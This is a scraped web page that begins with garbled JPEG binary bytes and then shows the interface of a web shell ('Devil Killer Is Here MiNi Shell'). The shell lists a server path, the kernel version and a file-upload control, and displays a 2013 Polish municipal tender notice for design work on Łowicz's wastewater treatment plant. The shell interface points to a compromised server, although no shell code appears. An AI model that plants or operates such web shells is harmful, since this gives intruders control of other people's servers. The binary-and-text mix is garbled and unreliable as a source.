JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130718/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130718/281258-N-2013.html

<p class="kh_header"><b>Łowicz: <br>Przebudowa oczyszczalni ścieków w Łowiczu - dokumentacja</b><br>
<b>Numer ogłoszenia: 281258 - 2013; data zamieszczenia: 18.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasta Łowicza - Urząd Miejski w Łowiczu , Stary Rynek 1, 99-400 Łowicz, woj. łódzkie, tel. 46 8309151, faks 46 8309160.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.bip.lowicz.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> <br>Przebudowa oczyszczalni ścieków w Łowiczu - dokumentacja.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> <br>Przedmiot niniejszego zamówienia stanowi Opracowanie dokumentacji projektowo-wykonawczo-kosztorysowej dla zadania pn. Przebudowa oczyszczalni ścieków w Łowiczu - dokumentacja  wraz z uzyskaniem pozwolenia na budowę.

<br>W skład opracowań i czynności do wykonania w ramach zamówienia wchodzą:

<br>1.Inwentaryzacja oczyszczalni ścieków.
<br>2.Dokumentacja geologiczna do celów projektowych.
<br>3.Podkłady geodezyjne terenu inwestycji (mapy do celów projektowych oraz mapa ewidencyjna wraz z wypisem z ewidencji gruntów).
<br>4.Bilans ilości ścieków, stężeń i ładunków zanieczyszczeń sporządzony w oparciu o ilości ścieków oraz wyniki badań z lat 2010, 2011, 2012 
<br>5.Obliczenia procesowe.
<br>6.Koncepcja modernizacji i przebudowy oczyszczalni ścieków (co najmniej 3-wariantowa) wraz z  Zbiorczym Zestawieniem Kosztów (ZZK) i określeniem kosztów eksploatacji dla każdego z wariantów.
<br>7.Uzyskanie decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia wraz z opracowaniem wszystkich niezbędnych materiałów, w tym raportu oddziaływania inwestycji na środowisko.
<br>8.Projekt budowlany modernizacji i rozbudowy oczyszczalni ścieków kompletny w zakresie wszystkich branż:
<br>-operat zagrożenia obiektów wybuchem wraz z klasyfikacją stref
<br>-projekty wszystkich obiektów kubaturowych w branżach: technologicznej, architektonicznej, konstrukcyjnej, sanitarnej, elektrycznej, AKPiA
<br>-projekt technologiczny procesowy
<br>-projekt sieci sanitarnych wewnętrznych
<br>-projekt sieci elektrycznych wewnętrznych
<br>-projekt AKPiA
<br>-projekt dróg i placów wewnętrznych
<br>-inwentaryzacja i projekt zieleni
<br>-wytyczne do planu BIOZ
<br>-projekt zagospodarowania terenu
<br>-uzgodnienia przez rzeczoznawców sanepid, BHP i p.poż.
<br>9.Uzyskanie pozwolenia na budowę oczyszczalni oraz opinii, uzgodnień, pozwoleń, operatów i badań, których obowiązek uzyskania wynika z prawa polskiego przy opracowywaniu projektu budowlanego oraz uzyskaniu pozwolenia na budowę.
<br>10.Projekty wykonawcze oczyszczalni ścieków, spełniające wymagania polskich przepisów w zakresie bezpieczeństwa pracy, warunków sanitarnych, ochrony środowiska i ochrony pożarowej oraz posiadających wymagane uzgodnienia i zatwierdzenia, w tym:
<br>- projekty wszystkich obiektów kubaturowych w branżach: technologicznej, architektonicznej, konstrukcyjnej, sanitarnej, elektrycznej, AKPiA
<br>- projekt technologiczny procesowy
<br>- projekt sieci sanitarnych wewnętrznych (wod-kan, centralnego ogrzewania, wentylacja,klimatyzacja,  p-poż.),
<br>- projekt sieci elektrycznych wewnętrznych (elektryczna i teletechniczna)
<br>- projekt AKPiA
<br>- projekt dróg i placów wewnętrznych
<br>- uzgodnienia z Zamawiającym 
<br>Projekty wykonawcze będą przedstawiać szczegółowe usytuowanie wszystkich urządzeń i elementów robót, ich parametry wymiarowe i techniczne, szczegółową specyfikację (ilościową i jakościową) urządzeń i materiałów.
<br>11.Specyfikacje Techniczne Wykonania i Odbioru Robót z podziałem na branże  i etapy realizacji
<br>12.Przedmiary i kosztorysy inwestorskie z podziałem na branże i etapy realizacji
<br>13.Etapowanie robót  przy założeniu, że wykonany zakres  robót  może być włączony w <br>ciąg technologiczny oczyszczalni i nie pogorszy jej  funkcjonowania 
<br>14.Nadzór autorski nad realizacją zaprojektowanych prac.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.31.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 15.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> <br>1.Wykonawca jest zobowiązany do wniesienia wadium w wysokości: 12.000,00 złotych (słownie: dwanaście tysięcy złotych 00/100).
<br>2.Wadium może być wniesione w następujących formach:

<br>- pieniądzu, 
<br>- poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
<br>- gwarancjach bankowych,
<br>-gwarancjach ubezpieczeniowych,
<br>-poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2  ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U.z 2007 r., Nr 42, poz. 275).
<br>3. Wadium wnosi się przed upływem terminu składania ofert.
<br>-	Wadium w pieniądzu powinno być wpłacone przelewem na rachunek Urzędu Miejskiego w Łowiczu w Banku Gospodarki Żywnościowej SA 
nr 04 2030 0045 1110 0000 0236 7900  .
z dopiskiem na przelewie -WADIUM- i oznaczyć: -Przebudowa oczyszczalni ścieków w Łowiczu - dokumentacja.
<br>W przypadku wniesienia wadium w poręczeniach lub gwarancjach, oryginał musi być w odrębnej zamkniętej   kopercie oznaczonej  napisem WADIUM - Przebudowa oczyszczalni ścieków w Łowiczu - dokumentacja-  dołączony do złożonej oferty</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p><br>Zamawiający nie wyznacza warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p><br>Za spełniającego warunek posiadania wiedzy i doświadczenia Zamawiający uzna Wykonawcę który wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniane będą ich łączne kwalifikacje i doświadczenie; w tym celu dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wskazywać będą spełnienie tego warunku):
<br>-minimum dwie dokumentacje projektowe (obejmujące wykonanie projektu budowlanego na podstawie którego wydano pozwolenie na budowę i projektu wykonawczego) polegające na zaprojektowaniu budowy, przebudowy, rozbudowy lub modernizacji oczyszczalni ścieków komunalnych, o przepustowości nie mniejszej niż 10.000m3na dobę (lub RLM co najmniej 50.000), w tym:
<br>co najmniej jedną w zakresie gospodarki ściekowej i osadowej, z zastosowaniem przeróbki osadów przy zastosowaniu procesu fermentacji (na WKF), 
<br>co najmniej jedną z zastosowaniem termicznego  suszenia  osadów
<br>Do oferty należy załączyć dowody, czy  usługi zostały wykonane należycie. 
Zaleca się, aby przedkładane dowody czy wykonane przez Wykonawców usługi zostały wykonane należycie, zawierały, co najmniej:
<br>-wskazanie, że Wykonawca składający ofertę w niniejszym postępowaniu realizował usługi, których dokumenty dotyczą,
<br>-wskazanie podmiotu, na rzecz którego realizowane były wyżej wymienione usługi,
<br>-wskazanie przedmiotu i zakresu usług,
<br>-wskazanie daty wykonania (rozpoczęcia i zakończenia),
<br>-wskazanie miejsca wykonania, 
<br>-podanie wartości usługi,
<br>Dowodami, o których mowa są : 
<br>-poświadczenie, 
<br>-oświadczenie wykonawcy- jeżeli z uzasadnionych przyczyn o obiektywnym charakterze  wykonawca nie jest w stanie uzyskać wyżej wymienione poświadczenia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p><br>Zamawiający nie wyznacza warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p><br>Za spełniającego warunek dysponowania osobami zdolnymi do wykonania niniejszego zamówienia Zamawiający uzna Wykonawcę spełniającego następujące warunki (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał techniczny i kadrowy oraz łączne kwalifikacje i doświadczenie)
<br>1.wskaże do uczestniczenia w wykonywaniu niniejszego zamówienia następujące osoby wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności, oraz informacją o podstawie do dysponowania tymi osobami:
<br>1.1.Kierownik zespołu projektowego
<br>-Wykształcenie: wyższe techniczne
<br>-Kwalifikacje zawodowe: uprawnienia budowlane do projektowania bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych lub odpowiadające im ważne uprawnienia budowlane wydane w świetle wcześniej obowiązujących przepisów prawa lub odpowiednie do nich kwalifikacje zawodowe uznawane na zasadach określonych w odrębnych przepisach;
<br>-Ogólne doświadczenie zawodowe - co najmniej 10-letnie doświadczenie zawodowe w projektowaniu,
<br>Szczególne doświadczenie zawodowe - co najmniej 5-letnie doświadczenie w pełnieniu samodzielnych funkcji technicznych w budownictwie na stanowisku Projektanta i udział (w charakterze kierownika zespołu projektowego) w zaprojektowaniu obiektów podobnych do przedmiotu zamówienia:
<br>co najmniej jednej oczyszczalni ścieków komunalnych, o przepustowości nie mniejszej niż 10.000m3 na dobę (lub RLM co najmniej 50.000), 
<br>co najmniej dwóch zakończonych inwestycji z zakresu gospodarki wodno-ściekowej,
<br>1.2.Projektant - technolog
<br>-Wykształcenie: wyższe techniczne.
<br>-Kwalifikacje zawodowe: uprawnienia do projektowania bez ograniczeń w specjalności instalacyjnej w zakresie projektowania  sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych wydane na podstawie aktualnych przepisów Prawa budowlanego lub inne ważne uprawnienia, wydane na podstawie wcześniej obowiązujących przepisów.
<br>-Ogólne doświadczenie zawodowe - co najmniej 10-letnie doświadczenie zawodowe w projektowaniu obiektów instalacji gospodarki odpadami,
<br>-Szczególne doświadczenie zawodowe - co najmniej 5-letnie doświadczenie w pełnieniu samodzielnych funkcji technicznych w budownictwie na stanowisku projektanta i doświadczenie w projektowaniu (w charakterze projektanta technologa) obiektów podobnych do przedmiotu zamówienia:
<br>co najmniej trzech oczyszczalni ścieków komunalnych, o przepustowości nie mniejszej niż 10.000m3na dobę (lub RLM co najmniej 50.000), 
<br>co najmniej dwóch zakończonych inwestycji z zakresu gospodarki wodno-ściekowej,
<br>1.3.Projektant - w specjalności konstrukcyjno- budowlanej
<br>-Wykształcenie: wyższe techniczne.
<br>-Kwalifikacje zawodowe: uprawnienia do projektowania bez ograniczeń w specjalności konstrukcyjno-budowlanej wydane na podstawie aktualnych przepisów Prawa budowlanego lub inne ważne uprawnienia, wydane na podstawie wcześniej obowiązujących przepisów,
<br>-Ogólne doświadczenie zawodowe - co najmniej 10 letnie doświadczenie zawodowe w projektowaniu,
<br>-Szczególne doświadczenie zawodowe - co najmniej 5-letnie doświadczenie w pełnieniu samodzielnych funkcji technicznych w budownictwie na stanowisku projektanta i doświadczenie w projektowaniu (w charakterze projektanta konstrukcji budowlanych) obiektów podobnych do przedmiotu zamówienia:
<br>co najmniej jednej oczyszczalni ścieków komunalnych, o przepustowości nie mniejszej niż 10.000m3 na dobę (lub RLM co najmniej 50.000), 
<br>co najmniej dwóch zakończonych inwestycji z zakresu gospodarki wodno-ściekowej,
<br>1.4.Projektant - w specjalności architektonicznej
<br>-Wykształcenie: wyższe techniczne.
<br>-Kwalifikacje zawodowe: uprawnienia do projektowania bez ograniczeń w specjalności architektonicznej wydane na podstawie aktualnych przepisów Prawa budowlanego lub inne ważne uprawnienia, wydane na podstawie wcześniej obowiązujących przepisów,
<br>-Ogólne doświadczenie zawodowe - co najmniej 10 letnie doświadczenie zawodowe w projektowaniu,
<br>-Szczególne doświadczenie zawodowe - co najmniej 5-letnie doświadczenie w pełnieniu samodzielnych funkcji technicznych w budownictwie na stanowisku projektanta w specjalności architektonicznej.
<br>1.5.Projektant - w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych
<br>-Wykształcenie : wyższe techniczne,
<br>-Kwalifikacje zawodowe: uprawnienia do pełnienia samodzielnych funkcji technicznych w zakresie projektowania sieci, instalacji i urządzeń cieplnych , wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń, wydane na podstawie aktualnych przepisów Prawa budowlanego lub inne ważne uprawnienia, wydane na podstawie wcześniej obowiązujących przepisów.
<br>-Ogólne doświadczenie zawodowe - co najmniej 5-letnie doświadczenie zawodowe w projektowaniu,
<br>-Szczególne doświadczenie zawodowe - co najmniej 3-letnie doświadczenie w pełnieniu samodzielnych funkcji technicznych w budownictwie na stanowisku projektanta i doświadczenie w projektowaniu (samodzielnie lub jako członek zespołu projektowego) obiektów podobnych do przedmiotu zamówienia
<br<co najmniej jednej oczyszczalni ścieków komunalnych, o przepustowości nie mniejszej niż 10.000m3 na dobę (lub RLM co najmniej 50.000), 
<br>-co najmniej dwóch  zakończonych inwestycji z zakresu gospodarki wodno-ściekowej,
<br>1.6.Projektant - w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych
<br>-Wykształcenie: wyższe techniczne.
<br>-Kwalifikacje zawodowe: uprawnienia do projektowania bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych wydane na podstawie aktualnych przepisów Prawa budowlanego lub inne ważne uprawnienia, wydane na podstawie wcześniej obowiązujących przepisów 
<br>-Ogólne doświadczenie zawodowe - co najmniej 10-letnie doświadczenie zawodowe w budownictwie,
<br>Szczególne doświadczenie zawodowe - co najmniej 5-letnie doświadczenie w pełnieniu samodzielnych funkcji technicznych w budownictwie na stanowisku projektanta i doświadczenie w projektowaniu (samodzielnie lub jako członek zespołu projektowego) obiektów podobnych do przedmiotu zamówienia:
<br>co najmniej jednej oczyszczalni ścieków komunalnych, o przepustowości nie mniejszej niż 10.000m3 na dobę (lub RLM co najmniej 50.000),
<br>co najmniej dwóch zakończonych inwestycji z zakresu gospodarki wodno-ściekowej,
<br>1.7.Projektant - w specjalności drogowej
<br>-Wykształcenie: wyższe techniczne.
<br>-Kwalifikacje zawodowe: uprawnienia do projektowania bez ograniczeń w specjalności drogowej wydane na podstawie aktualnych przepisów Prawa budowlanego lub inne ważne uprawnienia, wydane na podstawie wcześniej obowiązujących przepisów, 
<br>-Ogólne doświadczenie zawodowe - co najmniej 5-letnie doświadczenie zawodowe w budownictwie,
<br>-Szczególne doświadczenie zawodowe - co najmniej 3-letnie doświadczenie w pełnieniu samodzielnych funkcji technicznych w budownictwie na stanowisku projektanta</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p><br>Za spełniającego warunek dotyczący sytuacji ekonomicznej i finansowej Zamawiający uzna Wykonawcę, który (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniana będzie ich łączna sytuacja ekonomiczna i finansowa, w tym celu dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wskazywać będą spełnienie tego warunku):
<br>-posiada środki finansowe w wysokości co najmniej  500.000 PLN lub posiada zdolność kredytową w wysokości co najmniej 500.000 PLN. W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są do przedłożenia informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, 
<br>-posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności w wysokości co najmniej 1.000.000 PLN. W celu potwierdzenia spełniania niniejszego warunku Wykonawca musi dołączyć do oferty opłaconą polisę, a w przypadku jej braku - inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia
<br>Jeżeli z uzasadnionej przyczyny wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnianie opisanego przez zamawiającego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br><br>Obowiązek wskazania przez wykonawcę w wykazie lub złożenie poświadczeń, w tym informacji o usługach niewykonanych lub wykonanych nienależycie dotyczy wszystkich dokumentacji projektowych  (obejmujących wykonanie projektu budowlanego na podstawie którego wydano pozwolenie na budowę i projektu wykonawczego) polegających  na zaprojektowaniu budowy, przebudowy, rozbudowy lub modernizacji oczyszczalni ścieków komunalnych, o przepustowości nie mniejszej niż10.000m3 na dobę (lub RLM co najmniej 50.000);</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

